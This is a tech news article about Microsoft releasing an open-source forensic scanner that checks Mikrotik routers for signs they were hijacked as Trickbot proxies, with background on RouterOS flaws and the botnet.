Microsoft releases open source Trickbot scanner for Mikrotik routers

By

Botnet remains a serious threat worldwide.

Microsoft's Defender for Internet of Things Research Team and Threat Intelligence Centre have jointly released an open source forensic tool for popular Mikrotik routers that have been hacked to act as proxy servers for the Trickbot malware gang.

Microsoft releases open source Trickbot scanner for Mikrotik routers
Source: Mikrotik

The researchers found that attackers who have several ways of to access Mikrotik routers were able to use commands specific to the Latvian vendor's RouterOS operating system (preceded by the "/" character), to redirect traffic to and from Trickbot command and control servers.

With the help of Microsoft's routeros-scanner tool, administrators can obtain device version identifiers, and map them to Common Vulnerabilities and Exposures (CVEs) indexes.

The tool also lets administrators check for scheduled tasks, traffic redirection rules, domain name system cache poisoning, default ports changes, suspicious files, non-default user accounts, and rules that set up proxying and change the device firewall settings.

Internet-reachable Mikrotik routers have been on hackers' radars for several years now. 

The Latvian router vendor suffered a major RouterOS vulnerability in 2018, which led to login credentials being captured.

Microsoft said that a vulnerability that security vendor Tenable produced a proof-of-concept for affects RouterOS older than version 4.2, and allows attackers to read arbitrary files on Mikrotik routers, such as user.dat which contains device passwords.

A search for Mikrotik routers connected to the internet via the Shodan.io scanning site showed just over 77,000 devices in Australia and New Zealand, and more than 3.3 million worldwide.

Built on the earlier Dyre malware, Trickbot is considered one of the world's most dangerous botnets, and is often used to deliver ransomware payloads.

Microsoft security engineers have cooperated with law enforcement worldwide to take down Trickbot infrastructure, resulting in some of the malware coders being arrested and extradited to the United States to stand trial.

Got a news tip for our journalists? Share it with us anonymously here.
Copyright © iTnews.com.au . All rights reserved.
Tags:
microsoftnetworkingsecurity

Sponsored Whitepapers

Futureproof Your Business with Datacom and AMD: Seamless Windows 11 Transition
Futureproof Your Business with Datacom and AMD: Seamless Windows 11 Transition
See everything. Do more.
See everything. Do more.
Lindentech Secures Digital Identity with Zero Trust and Microsoft Entra
Lindentech Secures Digital Identity with Zero Trust and Microsoft Entra
Diamond IT Delivers GRC Transformation with Microsoft Purview
Diamond IT Delivers GRC Transformation with Microsoft Purview
Linktech Powers Energy Trader’s Essential Eight Compliance in Just Eight Weeks
Linktech Powers Energy Trader’s Essential Eight Compliance in Just Eight Weeks

Events

Most Read Articles

Health signs $33m networks deal with Optus

Health signs $33m networks deal with Optus
Optus quietly delays mobile-to-satellite service launch

Optus quietly delays mobile-to-satellite service launch
Defence trials AI radiocomms deception technology

Defence trials AI radiocomms deception technology
Govt agencies asked to consider cloud in new strategy

Govt agencies asked to consider cloud in new strategy
techpartner.news logo
Dave Stevens on Brennan's evolution and the need for Aussie tech unity
Dave Stevens on Brennan's evolution and the need for Aussie tech unity
Sydney's ITKnocks on contact centre AI and the slow death of the IVR
Sydney's ITKnocks on contact centre AI and the slow death of the IVR
"It's an exciting time to be part of the health and aged care sector"
"It's an exciting time to be part of the health and aged care sector"
Insicon founder Matt Miller on the coming 'tsunami' of compliance and educating boards about cyber security
Insicon founder Matt Miller on the coming 'tsunami' of compliance and educating boards about cyber security
Orro claims Australia first with managed digital asset discovery service
Orro claims Australia first with managed digital asset discovery service

Log In

  |  Forgot your password?